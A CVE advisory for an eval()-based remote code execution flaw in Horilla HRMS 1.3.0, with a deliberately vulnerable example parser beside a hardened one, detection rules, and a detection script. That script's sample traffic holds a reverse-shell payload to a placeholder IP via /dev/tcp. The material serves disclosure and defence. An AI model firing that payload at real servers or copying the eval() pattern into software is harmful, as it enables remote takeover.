CVE-2025-48868
published 2025-09-24


Priority: P2 (58) · Severity: high · CVSS 3.1 base score: 7.2
Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Exploit: see Detection & IOCs below (the exploit's request structure is described there)
EPSS: 2.33% (81.4th percentile)
Horilla is a free and open source Human Resource Management System (HRMS). An authenticated Remote Code Execution (RCE) vulnerability exists in Horilla 1.3.0 due to the unsafe use of Python’s eval() function on a user-controlled query parameter in the project_bulk_archive view. This allows privileged users (e.g., administrators) to execute arbitrary system commands on the server. While having Django’s DEBUG=True makes exploitation visibly easier by returning command output in the HTTP response, this is not required. The vulnerability can still be exploited in DEBUG=False mode by using blind payloads such as a reverse shell, leading to full remote code execution. This issue has been patched in version 1.3.1.
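The pattern the advisory describes, as an added illustration written for this page and not Horilla's own project_bulk_archive code: a "boolean" query parameter handed to eval() beside a strict allow-list parser. The in-memory project store, the dict-based request model and every function name are assumptions; it runs without Django.

```python
"""Illustrative Django-style bulk-archive view showing the eval()-on-query-parameter
pattern the advisory describes, beside a hardened replacement. Written for this page;
NOT Horilla's own code. The project store, request shape and names are assumptions."""

# Constructed project records standing in for the database rows a bulk-archive view updates.
PROJECTS = {
    1: {"title": "Onboarding", "is_active": True},
    2: {"title": "Payroll migration", "is_active": True},
}


def parse_is_active_vulnerable(query):
    """Vulnerable pattern: the flag taken from ?is_active=... is passed to eval().

    eval() executes any Python expression, so an authenticated user supplying
    __import__('os').system('...') runs a shell command as the web worker.
    """
    return eval(query.get("is_active", "False"))


def parse_is_active_hardened(query):
    """Hardened replacement: the flag is data, not code, so map an allow-list of strings."""
    raw = str(query.get("is_active", "false")).strip().lower()
    mapping = {"true": True, "1": True, "false": False, "0": False}
    if raw not in mapping:
        raise ValueError(f"is_active must be true/false, got {raw!r}")
    return mapping[raw]


def project_bulk_archive(query, body, parse_flag):
    """Toy stand-in for the view: set is_active on every project listed in the body's ids.

    parse_flag is one of the two parsers above, so the same view can be exercised in
    its vulnerable and its hardened form.
    """
    new_state = parse_flag(query)
    ids = [int(i) for i in body.get("ids", [])]
    for pid in ids:
        PROJECTS[pid]["is_active"] = new_state
    return {pid: PROJECTS[pid]["is_active"] for pid in ids}


# Constructed requests: a benign archive, and one carrying an expression instead of a
# boolean. The expression here is harmless (it returns the interpreter version) but an
# __import__('os').system(...) payload is evaluated exactly the same way.
BENIGN_QUERY = {"is_active": "False"}
ATTACK_QUERY = {"is_active": "__import__('platform').python_version()"}
BODY = {"csrfmiddlewaretoken": ["deadbeef"], "ids": ["1", "2"]}

if __name__ == "__main__":
    print(parse_is_active_vulnerable(ATTACK_QUERY))  # the attacker's expression was executed
    try:
        parse_is_active_hardened(ATTACK_QUERY)
    except ValueError as exc:
        print("rejected:", exc)
```

The hardened parser rejects anything that is not an explicit boolean token; that is the whole fix, since a flag never needs expression evaluation. DEBUG=True only changes whether the evaluated value is echoed back in the error page, not whether the expression runs.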

Affected (2 ranges)

Vendor               Product   Version range   Fixed in
horilla-opensource   horilla   1.3.0           1.3.1
horilla              horilla   1.3.0           1.3.1

Detection & IOCs (extracted from sources)

Indicator (type: other): is_active=<eval_payload>
  • Monitor HTTP POST requests to the project-bulk-archive endpoint whose `is_active` query parameter contains anything other than a plain boolean: shell metacharacters (including percent-encoded forms such as %26 for `&`), backticks, Python builtins such as `__import__`, or reverse-shell fragments such as `/dev/tcp/`.
  • Alert on outbound TCP connections from the web server process (e.g., the Python/Django worker) to unexpected external IPs/ports, indicative of a reverse shell spawned via /dev/tcp.
  • In DEBUG=False (blind RCE) mode no command output is returned in the HTTP response, so exploitation is only visible on the network side: monitor for reverse-shell callbacks originating from the Horilla server.
  • Flag POST requests to the bulk-archive view that include both a `csrfmiddlewaretoken` and an `ids` body parameter alongside a suspicious `is_active` query string; this matches the exploit's exact request structure.
  • Exploitation requires an authenticated session (privileged user, e.g., administrator). Detection rules should expect valid session cookies and CSRF tokens to be present in malicious requests and must not whitelist traffic on that basis.
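The first and fourth rules above, as an added detection example run over constructed sample requests (this is not a rule or code from the page's sources): a POST to the bulk-archive endpoint is flagged when its `is_active` query value is not a plain boolean, with the `csrfmiddlewaretoken` + `ids` body fields as a confirming signal. The endpoint path fragment, the (method, url, body) record shape and the sample traffic are assumptions.

```python
"""Detection logic for the request pattern in the IOC list above. Added example, not
from the page or the project. The endpoint path fragment, the (method, url, body)
record shape and the sample requests are assumptions constructed for illustration."""
import re
from urllib.parse import parse_qs, urlsplit

ENDPOINT_FRAGMENT = "project-bulk-archive"   # assumed path substring
BOOLEAN_VALUES = {"true", "false", "1", "0"}   # anything else is not a flag
# Shell metacharacters, backticks, /dev/tcp and common eval() payload builtins.
# parse_qs decodes the percent-encoded forms from the IOC list (%26 -> &, %60 -> `)
# before this is applied, so the raw query string does not need a separate check.
SUSPICIOUS = re.compile(r"[`;&|$(){}<>]|/dev/tcp|__import__|subprocess|\bos\b", re.I)


def inspect_request(method, url, body):
    """Return the reasons a request looks like CVE-2025-48868 exploitation ([] if clean)."""
    parts = urlsplit(url)
    if method.upper() != "POST" or ENDPOINT_FRAGMENT not in parts.path:
        return []
    reasons = []
    for value in parse_qs(parts.query, keep_blank_values=True).get("is_active", []):
        if value.strip().lower() not in BOOLEAN_VALUES:
            reasons.append(f"non-boolean is_active value: {value!r}")
        if SUSPICIOUS.search(value):
            reasons.append("shell/eval metacharacters in is_active")
    body_fields = parse_qs(body, keep_blank_values=True)
    if reasons and "csrfmiddlewaretoken" in body_fields and "ids" in body_fields:
        reasons.append("body matches the bulk-archive form (csrfmiddlewaretoken + ids)")
    return reasons


def scan(records):
    """Run inspect_request over (method, url, body) records; return [(index, reasons)] hits."""
    hits = []
    for i, (method, url, body) in enumerate(records):
        reasons = inspect_request(method, url, body)
        if reasons:
            hits.append((i, reasons))
    return hits


# Constructed sample traffic: a normal archive, a blind reverse-shell payload of the kind
# the advisory describes (percent-encoded as a client would send it), and an unrelated GET.
SAMPLE_REQUESTS = [
    ("POST", "/project/project-bulk-archive?is_active=False",
     "csrfmiddlewaretoken=abc123&ids=%5B1%2C2%5D"),
    ("POST", "/project/project-bulk-archive?is_active="
     "__import__('os').system('bash%20-i%20%3E%26%20/dev/tcp/10.0.0.5/4444%200%3E%261')",
     "csrfmiddlewaretoken=abc123&ids=%5B1%5D"),
    ("GET", "/project/project-view?is_active=True", ""),
]

if __name__ == "__main__":
    for index, reasons in scan(SAMPLE_REQUESTS):
        print(f"request #{index}:")
        for reason in reasons:
            print("  -", reason)
```

Because the value is decoded before matching, a legitimate second query parameter (`?is_active=true&page=2`) does not trip the `&` check; only metacharacters inside the `is_active` value itself do. The presence of a valid CSRF token is treated as a confirming signal, never as a reason to suppress the alert.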